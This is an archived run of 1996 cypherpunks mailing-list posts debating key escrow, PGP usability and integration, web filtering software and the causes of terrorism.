I thought Ken Bass was wrong on this point (I agreed with everything else
he said): wiretaps help LEOs identify co-conspirators.  They are not
without intelligence value. 

[This message may have been dictated with Dragon Dictate 2.01. 
Please be alert for unintentional word substitutions.]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 4 Jul 1996 05:32:30 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: SAFE Forum--some comments
Message-ID: <199607031659.JAA25899@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:34 PM 7/2/96 -0800, jim bell wrote:
>However, that AT+T fellow who revealed the phone records to the militia 
>group would also be an appropriate comparison to destroy the "key-escrow" 
>idea.  I assume AT+T had procedures in place which were SUPPOSED TO prevent 
>this.  Well, key-escrow agents "will" also have similar procedures.  Why 
>should we assume they will be more reliable?

We shouldn't.  In fact, they will have a much higher economic value.  I
would expect them to be more vulnerable to insiders.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Fri, 5 Jul 1996 07:35:37 +0800
To: m5@vail.tivoli.com (Mike McNally)
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
In-Reply-To: <31DA7000.6239@vail.tivoli.com>
Message-ID: <m0ubSo0-0000uBC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally enscribed thusly:

> Declan McCullagh/Brock Meeks wrote (and quite well, I might add):
> > ...
> > Install the programs and Junior can't access porn. No fuss, no muss, no
> > bother. "Parental empowerment" is the buzzword. Indeed, it was these
> > programs that helped sway the three-judge panel in Philly to knock down
> > the Communications Decency Act as unconstitutional.

> Scenario:  Mr. & Mrs. Joseph and Mary Christian buy SmutNoMore for
> their home computer, to protect their children Mathew, Mark, Luke,
> John, and Zebediah.  All are happy and content.

> One day, Mathew and Mark go to a the home of a school chum, Bart 
> Simpson, whose parents are products of the liberal 60's.  Bart has 
> a computer too, along with an ISDN link through a local ISP to
> the Internet.  But --- horrors --- Bart's computer is not equipped
> with SmutNoMore, or any other filtering software.  Bart's parents
> do not believe it to be fair to filter their children's access to
> information.

> During that afternoon of Internet fun, Mark clicks the mouse and
> follows a hyperlink link to a web site filled with nasty objectionable
> anti-family morally corrosive filth.  Mark and Mathew run home in
> tears to their parents and tell all about the nightmare they've
> experienced.

> I wonder whether the Christians would be able to successfully sue
> the Simpsons on some sort of "corruption of a minor" deal?  Indeed,
> couldn't it even be possible that some local prosecutor might find
> the Simpsons criminally involved?

	Scenario update:  Replace all instances of Bart's computer and internet
connections with Playboy or Penthouse (or worse - Hustler!) magazines found in
a drawer in the house.  You then discover this to be the shear and utter
gibberish that it really is...

	BTW...  You will also discover that the new senario is orders of
magnitude MORE likey than the former.

> ______c_____________________________________________________________________
> Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
>        m5@tivoli.com * m101@io.com          *
>       <URL:http://www.io.com/~m101>         * suffering is optional

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bluebreeze@nym.jpunix.com
Date: Thu, 4 Jul 1996 04:23:28 +0800
To: cypherpunks@toad.com
Subject: Re: Sameer on C-SPAN
Message-ID: <199607031555.KAA02107@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


:bluebreeze@nym.jpunix.com (Blue Breeze) wrote:
:>
:> Not everything. No picture of Sameer!? That's what I'd like to see.
:
:There's one in the latest WebSmith magazine.

Thanks Matt.

Outta my way!

(Thanks to Alan too.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Thu, 4 Jul 1996 05:25:28 +0800
To: jim bell <snow@smoke.suba.com>
Subject: Re: But what about the poor?
Message-ID: <1.5.4.16.19960703170022.48475994@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09.29 PM 7/2/96 -0800, jim bell wrote:
>At 10:16 PM 7/2/96 -0500, snow wrote:
>>On Tue, 2 Jul 1996, jim bell wrote:
>>> stated policy of the escrow agent is that the key owner MUST be informed, 
>>> what are the cops gonna do about it? 
>>> 
>>> Further, how are the cops going to evidence the existence of a valid 
>>> warrant?  (As opposed to a forgery?)
>>
>>     The judge that issues it will digitally sign it. You can check the
>>signature block. 
>
>
>However, what about an UNCOOPERATIVE escrow agent? (one who insists on 
>signed paper, or for that matter insists that the judge himself shows up.)   
>Or one, at least, who sites himself in Borneo, on the top of a 4000 foot 
>mountain, with a 386 laptop computer and a box of floppies, and who promises 
>2 hour services to anybody who shows up?  No email, no fax, no phone, no 
>light, no motor car, not a single luxury....oooops....sorry about that...not 
>even radio.  
>
>Moreover, if the escrow agent is out of the country, can any domestic laws 
>force him to divulge keys?

And anyway, you could just be a kind of escrow agent that will hold the keys
for the key owner, right? You don't have to say that you will provide them to
the government, right?

===============================================================================
David Rosoff (nihongo o sukoshi dekiru)  ---------------->  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Anonymous ok, PGP ok.  If it's not PGP-signed, you know that I didn't write it.
=== === === === === === === === === === === === === === === === === === === ===
"Truth is stranger than fiction, especially when truth is being defined by the
O.J. Simpson Defense Team." -Dave Barry

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdqh6hguzHDTdpL5AQFD4gQAlm9cekEcnq26tQkwTljb+xDGc5wRQL6e
D5gqXo2JpCQuLXfdYND5ROoV58T4UL43uXMfo8ziqq2mMNRY5SsNKaOWi+f4bw6c
SEhMBeBIzLnd50rIzQvWfRzaVr1NBwKjlOGpmRD9H3lWsap/l2ttog4CdShWRWdv
4GMLwzh+PhE=
=Y2+p
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Thu, 4 Jul 1996 05:36:48 +0800
To: cypherpunks@toad.com
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
Message-ID: <1.5.4.16.19960703170027.5fc7bc80@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12.10 AM 7/3/96 -0500, Declan McCullagh wrote:

>CyberWire Dispatch // Copyright (c) 1996 //

>Install the programs and Junior can't access porn. No fuss, no muss, no
>bother. "Parental empowerment" is the buzzword. Indeed, it was these
>programs that helped sway the three-judge panel in Philly to knock down
>the Communications Decency Act as unconstitutional.

I've wondered .. could a creative child circumvent these filter programs
using a URL-redirecter, like where you see something like
http://www.one.site.com/cgi-bin/rd?http://www.porno-site.com/
or are they not URL-based?

===============================================================================
David Rosoff (nihongo o sukoshi dekiru)  ---------------->  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Anonymous ok, PGP ok.  If it's not PGP-signed, you know that I didn't write it.
=== === === === === === === === === === === === === === === === === === === ===
"Truth is stranger than fiction, especially when truth is being defined by the
O.J. Simpson Defense Team." -Dave Barry

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdqkPhguzHDTdpL5AQG77QP7B6oJR9SOeJYyTP9fnad+Yn/fA/ZObaf3
szA2m9Sytxslfd/Juu19KfTTTjncE7dHMBnq6PuyouKD5jwkTnncnXNe7R2Tgjp8
SdVpyUUdFz++lLdBQ1WYos+eCU2QaGqsYe5+79MkHhFOk1XOhAH8zX5hG9kwuO+q
8C9/wuf6ZyU=
=NfcF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Thu, 4 Jul 1996 05:37:03 +0800
To: Simon Spero <WlkngOwl@unix.asb.com>
Subject: Re: PGP secret keys [PUN]
Message-ID: <1.5.4.16.19960703170031.48477926@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07.23 AM 7/3/96 -0400, Simon Spero wrote:
>On Tue, 2 Jul 1996, Deranged Mutant wrote:
>
>> On  2 Jul 96 at 6:39, anonymous-remailer@shell.port wrote:
>> 
>> > Could someone post a pointer to a FAQ that tells what to do if you loose
>> > your secret key file?  How can you regenerate your private key so that the
>> You can't do anything. Yer screwed.
>
>Unless you buy an 'O' and you're escrowed :-)

AAAAAAGH!

Death by pun!

===============================================================================
David Rosoff (nihongo o sukoshi dekiru)  ---------------->  drosoff@arc.unm.edu
For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu
0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
Anonymous ok, PGP ok.  If it's not PGP-signed, you know that I didn't write it.
=== === === === === === === === === === === === === === === === === === === ===
"Truth is stranger than fiction, especially when truth is being defined by the
O.J. Simpson Defense Team." -Dave Barry

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdqkpBguzHDTdpL5AQG4KAP9G0Ej5v4wIytlZYGywG2hfgHKGHqmqt58
lCd9cdEno1vD0OzYHx86wx7unxfIBZU93ueKsFLpou0XKnTxBuDc0qw/z4WORBUc
WGANjF2+XyyR/RxrVKNIwl/mbdc59WmWP2Mg1Xzb19kULhvRXbMS7kQJYba+JmRF
jXvXJC4V6b4=
=lQxI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 4 Jul 1996 03:44:48 +0800
To: bshantz@nwlink.com
Subject: Re: Lack of PGP signatures
In-Reply-To: <199607031436.HAA27482@montana.nwlink.com>
Message-ID: <199607031509.LAA09556@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I'm sure Derek and the other guys on PGPlib will make it easier to
> integrate into applications.  Am I just blowing smoke, Mr. Atkins?

No, you are not blowing smoke.  That is the hope of the PGPlib
project; PGPlib will make it easy (almost trivial) to integrate PGP
security into almost any application.

> In my free time, I have been playing around with add ons for 
> Microsoft Exchange.  I've got an OLE 2.0 encryption object that 
> embeds nicely into an Exchange message.  I haven't tied it in to PGP 
> yet, because I have been waiting for the release of PGPlib.  However, 
> that will allow at least some seamless integration.

Neat.  I don't know enough about OLE to comment, but can we discuss
this offline?  Is there an equivalent of OLE (AppleEvents, perhaps?)
for the Mac?  It would be really cool if we could come up with a
plug-in standard that gets put into mailers such that we could later
add a PGP drop-in that performs the encryption using those standard
interfaces.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joseph Seanor <cibir@netcom.com>
Date: Thu, 4 Jul 1996 07:07:58 +0800
To: cypherpunks@toad.com
Subject: Setting a PGP keyserver on my Web server
In-Reply-To: <199607031436.HAA27482@montana.nwlink.com>
Message-ID: <Pine.3.89.9607031234.A16131-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain



How can I go about setting up a PGP keyserver on my Web Server?

Joseph Seanor 
cibir@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 4 Jul 1996 07:14:08 +0800
To: cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
Message-ID: <199607031912.MAA08945@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At  7:38 AM 7/3/96 +0000, Brad Shantz wrote:
>PGP is a pain for encrypting or signing e-mail when you have to save 
>your message out to a temp file, encrypt it, and load it back in to 
>your mail package.

On my Mac I just entered this answer, cut it to the clipboard, launched
PGP, clearsigned it, and pasted the result back into the Eudora window for
the new mail.

Bill


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMdqyT9QgMXPCzT+1AQF35QMAiUM/5pVLwh41m0KncAiW+kms0d/GWn2W
C8RNwQpzanwEBaNyCpd/MSPdMAz5+YRrstnmp9MqGwbKMbsW4frqb86Dxdpgp2/f
qnwHvik9PlU/K81unAPij83MulSuysdJ
=feiY
-----END PGP SIGNATURE-----


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 4 Jul 1996 07:14:50 +0800
To: minow@apple.com (Martin Minow)
Subject: Re: SAFE Forum--some comments
Message-ID: <199607031912.MAA08980@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:44 PM 7/2/96 -0700, Martin Minow wrote:

>It's not quite that bad. Here are a few (more or less strong) crypto
>products you might not know you have:
>
>1. Every Macintosh made since at least 1988 has a secure authentication
>   client module in the AppleShare Chooser dialog. When you use it to
>   connect to a remote server, it notes that the user information
>   is "two-way scrambled." (The server sends a random number challenge
>   that the client uses to encrypt the username and password. The
>   encrypted information is sent to the server.) All Macintosh systems
>   running System 7 or later have the corresponding server software.
>   What is interesting about this is that the encryption is completely
>   invisible to the user.

I hear this as the server sends out a key which the client uses to encrypt
the username/password.  This algorithm makes less sense than the one I
thought I heard at the SAFE forum on Monday which was:

(1) The server sends out a challenge/salt (different each time)
(2) The client uses a secure hash to compute hash(salt||password) and
returns the username and the hash.
(3) The server computes hash(salt||password) and compares the hashes.

Given that there is still some interest in algorithms and protocols on this
list, can you describe what is really happening?

Thanks - Bill


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 4 Jul 1996 05:36:18 +0800
To: Derek Atkins <bshantz@nwlink.com
Subject: Re: Lack of PGP signatures
In-Reply-To: <199607031436.HAA27482@montana.nwlink.com>
Message-ID: <v03007629ae004f708b49@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:09 AM -0400 7/3/96, Derek Atkins wrote:
> Is there an equivalent of OLE (AppleEvents, perhaps?)
> for the Mac?  It would be really cool if we could come up with a
> plug-in standard that gets put into mailers such that we could later
> add a PGP drop-in that performs the encryption using those standard
> interfaces.

Damn betcha. It's called OpenDoc, and it's probably the most exciting thing to happen to the Mac since desktop publishing. <plug> See my web-page for a rant or two on the subject. </plug>

Vinnie Moscaritolo (Famous ex-Marine and Samoan Attorney) started a list at mailto://majordomo@thumper.vmeng.com called mac-crypto (send "subscribe mac-crypto" in the body of the message), where we're talking about stuff like this, and other things. One of the projects we've been kicking around is a Macintosh Digital Commerce Conference ("Digital Commerce *is* Financial Cryptography", and all that...), and it looks like Vinnie's very close to getting a conference date set up.

A while ago, the folks working on the Macintosh Cryptography Interface Project merged their list with mac-crypto, so things have been getting interesting, even if traffic is a little sparse these days.  Getting a conference date firmed up should change that, we hope. So would a discussion of PGPlib in OpenDoc...

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws', 
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 4 Jul 1996 06:13:57 +0800
To: David Rosoff <drosoff@arc.unm.edu>
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
Message-ID: <v01510106ae0069d65752@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Sameer's www.anonymizer.com is not blocked -- yet, at least. Some of the
programs release weekly updates, so as soon as it's reported by some
Net-groping pornhound, I'm sure it'll end up in there.

But the blocking apps do more than just check on URLs -- which do
constitute most of the databases. (I mentioned that CyberPatrol lists 4,800
web sites.) They also block by keywords. So going through a URL-redirector
to "playboy.com" or "xxxpix" would fail.

CyberPatrol is free for the download. Check it out! http://www.cyberpatrol.com/

-Declan



>-----BEGIN PGP SIGNED MESSAGE-----
>
>At 12.10 AM 7/3/96 -0500, Declan McCullagh wrote:
>
>>CyberWire Dispatch // Copyright (c) 1996 //
>
>>Install the programs and Junior can't access porn. No fuss, no muss, no
>>bother. "Parental empowerment" is the buzzword. Indeed, it was these
>>programs that helped sway the three-judge panel in Philly to knock down
>>the Communications Decency Act as unconstitutional.
>
>I've wondered .. could a creative child circumvent these filter programs
>using a URL-redirecter, like where you see something like
>http://www.one.site.com/cgi-bin/rd?http://www.porno-site.com/
>or are they not URL-based?
>
>===============================================================================
>David Rosoff (nihongo o sukoshi dekiru)  ---------------->  drosoff@arc.unm.edu
>For PGP key 0xD37692F9, finger drosoff@acoma.arc.unm.edu
>0xD37692F9  Key fingerprint =  25 7D AA 01 85 41 43 89  50 5A 33 76 F1 F1 99 67
>Do you know who's reading your email? ---> http://www.arc.unm.edu/~drosoff/pgp/
>Anonymous ok, PGP ok.  If it's not PGP-signed, you know that I didn't write it.
>=== === === === === === === === === === === === === === === === === === === ===
>"Truth is stranger than fiction, especially when truth is being defined by the
>O.J. Simpson Defense Team." -Dave Barry
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQCVAwUBMdqkPhguzHDTdpL5AQG77QP7B6oJR9SOeJYyTP9fnad+Yn/fA/ZObaf3
>szA2m9Sytxslfd/Juu19KfTTTjncE7dHMBnq6PuyouKD5jwkTnncnXNe7R2Tgjp8
>SdVpyUUdFz++lLdBQ1WYos+eCU2QaGqsYe5+79MkHhFOk1XOhAH8zX5hG9kwuO+q
>8C9/wuf6ZyU=
>=NfcF
>-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: me@muddcs.cs.hmc.edu (Michael Elkins)
Date: Thu, 4 Jul 1996 08:16:42 +0800
To: cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
In-Reply-To: <199607031631.JAA07820@infinity.c2.org>
Message-ID: <199607032033.NAA07808@muddcs.cs.hmc.edu>
MIME-Version: 1.0
Content-Type: text/plain


nowhere@alpha.c2.org writes:
> At 09:42 PM 7/2/96 EDT, Derek Atkins <warlord@MIT.EDU> wrote:
> :Basically, I refuse to type my passphrase over the net, which signing
> :all my messages (this one included) would require.
> 
> Why, in heaven's name, would you have to "type your passphrase over the net" to encypher a message?

He was talking about signing messages that you send.  You have to enter your
passphrase possible over a TELNET session, which sends it across in the
clear.  This is a Bad Thing(tm) for keeping it truly private.

me
-- 
Michael Elkins <me@cs.hmc.edu>			http://www.cs.hmc.edu/~me
PGP key fingerprint = EB B1 68 32 3F B5 54 F9  6C AF 4E 94 5A EB 90 EC




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 4 Jul 1996 08:44:32 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: The Net and Terrorism
In-Reply-To: <adfff6be050210047fa0@[205.199.118.202]>
Message-ID: <199607032035.NAA24719@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM breaks a longstanding personal policy of never replying
to my posts directly. (well, thanks.)  realize that my 
speculation on his position is largely associated with the
vacuum of his continually refusing to discuss key points of his
essays.

>My article made my points, so I won't rewrite it here. You are of course
>not required to agree. You are free to live in crowded cites--near "soft
>targets." You are welcome to lobby for world peace and for economic changes
>to lessen terrorism.

lobbying is of marginal efficacy. I was not advocating lobbying congress.

imagine that all the palestinians had good paying jobs, for example. 
how many of them would be into rock-throwing and terrorism?  of course their 
own attitudes make such a thing very difficult. they may not have any
skills or reject a job even if offered one. I'm not saying such a thing
is easy. the fact that it is so elusive is proof of how difficult such
a thing is.

what you are failing to address is that terrorism is bred from DISCONTENT.
I do believe that it is possible for groups to live together without
DISCONTENT.  such a thing is incredibly difficult to achieve, but 
definitely impossible if one starts with the premise, as you do, that
such a thing is impossible. you will often find that some groups, if
given minor concessions, are quite aghast at such overtures. but when
both parties are stuck in "kill my enemies" mode, such a thing is
not conceivable of course.

I do NOT believe that living in the world is a zero-sum game as you
seem to suggest. your use of the term is very compelling. do you
believe human life is always at the expense of other human life?
if so I can see why you think terrorism and violence are inevitable
and likely to worsen (e.g. with the increase in population). but if
you start from a different premise, that human problems can be solved,
you may get a different reality.  (interesting though,
this dark view of the world as
a zero-sum game does seem to influence a lot of thinking here on this
list).

>(I think this is mostly hopeless. No matter how "nice" conditions get, for
>game-theoretic reasons there will be some groups seeking changes.)

"hopeless"-- couldn't have characterized your position better myself.

"groups seeking changes" == "terrorists"?? quite a leap of terminology. notice
that it is quite possible to PEACEFULLY work for changes without resorting
to violence. those that do resort to violence are at the most extreme
ends of the spectrum. terrorism is like an adult having the ultimate
temper tantrum. "if you don't give me what I want, I'll blow up a building".

>I've never made any claims, explicit or implicit, that such acts are "for
>no particular reason." Various groups--religious, political, corporate,
>etc.--see advantages and disadvantages in various course of action. (This
>sounds nebulous, but I am trying to avoid citing specific examples; I'm
>trying to separate out the reactions people have to specific camps and look
>at the bigger picture.)

again, a blurring of degrees of extremism. of course there will always
be conflicting demands of different groups in the world. but why does
this equate to an inevitable rise in terrorism? I think we should study
why it is that some people don't resort to violence to solve their
problems, and some do, and try to pinpoint the difference in their
psychologies. terrorists are not insane in a certain sense. they have
just pushed themselves out of the envelope.

>I never claimed that terrorists are doing it just for the fun of
>it.

I didn't say you claimed that.
what you seem to suggest an inherent irrationality to terrorism such
that it is often senseless. I'm trying to point out that terrorists
are not just insane people, and that we are not always going to have 
lots of terrorists just because there is always an insane percentage of
the human populace.

I would suggest that terrorism in this country is only going to get
worse if the government becomes more extreme. unfortunately, responses
to terrorism tend to increase the extremism of govt, so it is difficult
to separate cause from effect. I suspect we are already in this
negative feedback loop. but ask yourself, would tim mcveigh have
bombed the OK building if:

1. the FBI hadn't tried to cover up waco and ruby ridge
2. the FBI disciplined their agents, firing some on the spot
3. the FBI admitted making "egregious errors"
4. the FBI compensated families with cash without them having
to sue the government first

in retrospect, are any of these things not the "right thing to do" anyway?
didn't the government eventually end up doing most of them anyway
in the long run? what if they had apologized from the beginning?

now, I am not saying what Mcveigh did was justified-- what I am saying
is that the government could have potentially averted inflaming him
and a zillion other militia members by a particular course of action
that was inconceivable to them because of their need to preserve
their testosterone-laced image of manhood... I gues being a government
agent means never having to say you're sorry....  but terrorists are
subject to the exact same kind of extremism of course. the extreme
government and the extreme terrorist are the perfect match for each
other and continually inflame each other more.

>You and others are of course welcome to lobby for people to be nice to each
>other. Peace and brotherhood, rah rah.

"lobby". you are using your own straw man against me.   I don't advocate
lobbying or petitioning congress in particular 
to change the world. such measures play a small role. (btw, you probably
think mother teresa is an idiot based on that sentence)

>I believe there are basic game-theoretic reasons which make conflict and
>jockeying for power "not surprising."

again, a conflation of regular, routine conflict and disagreement
with extreme violence and terrorism. why can some people solve
their problems, or postpone their settlement, without resorting to violence?
why can't others?

>>the point is that there is no physical strategic value from bombing
>>symbols.  I was making the point that terrorism is extremely symbolic
>
>And the bombing in Beirut is explained how?

it was a highly symbolic action. the palestinians are enraged that
israel is largely supported through american dollars and military
support.

>Bear in mind that the British thought the Colonial tactic of shooting at
>them from behind trees--a "terrorist" tactic borrowed from the Indians who
>used it on the colonists--was immoral and unsportsmanlike. Ditto our
>feeling that the "sneak attack" on Pearl Harbor was immoral. I take the
>meta-view that the attack on Pearl Harbor was brilliantly carried-out
>military strategy, just as the bombing of the Marine barracks in Beirut was
>brilliantly carried-out military strategy.

ok, an interesting analogy. notice however why the japanese attacked however.
their critical oil supplies were being cut off. it wasn't just an exercise
in trying to destroy an enemy. we became their enemy for particular 
reasons.

>You really need read up on the "strategy of tension," esp. the writings of
>Stefano Dellechiai (sp?) and the Russian "anarchists" of the late 19th
>century. Also, the role the CIA played in funding former German commando
>Otto Skorzeny in setting up "terrorist" groups in the 1950s and 60s.

terrorists would not be terrorists unless they had their reasons. take
away their reasons for being terrorists and they have nothing to inflame
themselves about. that's my point.

>Basically, one of the things terrorists want to do is to provoke a
>crackdown by the ruling authorities, making things so bad that a
>counterrevolution occurs.

bzzzzt. you constantly talk about terrorists as if they are one single
kind of breed in the world. but they have a zillion different variations
and they are all violent for different reasons. they are fighting for
*causes*. the sole cause of a terrorist is not to destroy government.
they *want* to destroy government for some other reason. "I'm pissed off
about [x], therefore I'm going to destroy the government". now, they
*say* they are dedicated to destroying governments, but they're really
just pissed off about [x], and if you take away [x] (which the government
does often have a hand in) they have very little reason to be terrorists
any more.  ( McVeigh is a good case in point.)

there are terrorists who are explicitly dedicated to destroying government
merely because it is government, but I'd say this is an extreme form
of terrorism that is relatively rare. apparently you have studied these
forms the most and concluded they are the regular variety, and I take
exception to this.

 you will not find terrorism in societies that are largely
"contented". you cannot realize this until you study societies that are
"content", which is the opposite of what you have done, focus on societies
that are "discontented" and stuck in turmoil.

I think this is what I find remarkable about your writing. for terrorists,
destroying the government is a means to an end. but you often write
as if terrorism is the end itself, that terrorism is its own reason
for existence. that's what I'm questioning.

 They believe they will reap the rewards of such a
>counterevolution (or revolution, as it need not be "counter").

note that they are really interested in the rewards, not necessarily
the revolution. what would happen if they could obtain the rewards
without the revolution? frequently revolution is required because
the government is fanatically opposed to giving them their demands.
but their demands are rarely that extreme at the root. (a place to
live, religious tolerance, sovereignty, whatever). 

when you have terrorists, 
what you have is a government that is as extreme in its attitudes as
the terrorists. it takes two to tango, as you are suggesting. the
violent confrontation between government and terrorism is only
the result of a negative feedback loop in which both become more
extreme and polarized, each feeling that any concession to the other
is a sign of submission. it is *not* a natural course of civilized
society as you frequently suggest.

>My main point in my essay was that violence and authoritarianism are all
>around us, and that responding to the attacking of "soft targets" by
>cracking down on basic liberties is NOT something we should endorse.

well, we're in agreement, although at times it sounds like you are
rooting for the violent crackdown, the negative feedback loop. your
writing is very opaque sometimes. its not clear what you are 
advocating in particular. you seem to want to advocate things without
appearing to advocate them, eh?

>If you can't make your points reasonably and convincingly, I see that you
>once again make ad hominem arguments. Calling me "Timmy" is not terribly
>effective.

actually it was a term of endearment <g>. 
I would be awfully bored here without your postings. it's just a pity
that you don't ever consider reexamining your fundamental premises, or
stating them in depth.  but this is human nature, so I can't fault you 
for it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 4 Jul 1996 08:09:42 +0800
To: cypherpunks@toad.com
Subject: blocking software & brock meeks
Message-ID: <199607032037.NAA25035@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


sent this to Brock Meeks re: his latest column
I also ask cpunks not to harass these companies or their users--
it's a solution that's working.

------- Forwarded Message

To: brock@well.com
Subject: cyber blocking software
Date: Wed, 03 Jul 96 12:48:49 -0700
From: "Vladimir Z. Nuri" <vznuri@netcom.com>


I read your columns regularly. outstanding work.

regarding your recent dispatch: please do not harass the
blocking software companies too much. they are simply based
on a different premise than the regular net. the internet
starts out with, "everybody can access everything". they
start out with, "only stuff we approve of can be accessed".

what their system shows is that you will always have disagreement
and controversy whenever this software is employed, whereever
subjectivity is involved. it is a very legitimate and worthwhile
service for parents who would rather "err on the side of caution".

but far
better to have these organizations arguing & bickering with who they
censor than to have the people who are censored suing the
government. the people who want free net access have it, and
are unbothered by these controversies.  in other words, 
by moving the controversies to places where they are locally
contained (i.e. among the blockers and blockees) the rest
of the surfing public is unaffected and perhaps even protected
from harassment.

so you see? there is all kinds of ranting about censorship going
on, but it has nothing to do with the way the vast majority uses
the internet. it's completely voluntary. it's the perfect solution.
so far, nothing the blocking companies do can affect the net as
a whole. they are largely predicated on that function. 

in a real sense they are providing very general services of
"rating web sites our customers will be most interested in". 
and you realize, even the Point Communications awards are the
exact same thing.

so again, please do not harass the companies. it's a solution
that does work. the existence of controversy does not prove
it doesn't work. it in fact proves that it does work.



------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 4 Jul 1996 08:49:27 +0800
To: cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
Message-ID: <199607032105.OAA18411@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:15 PM 7/3/96 -0700, Bill Frantz wrote:
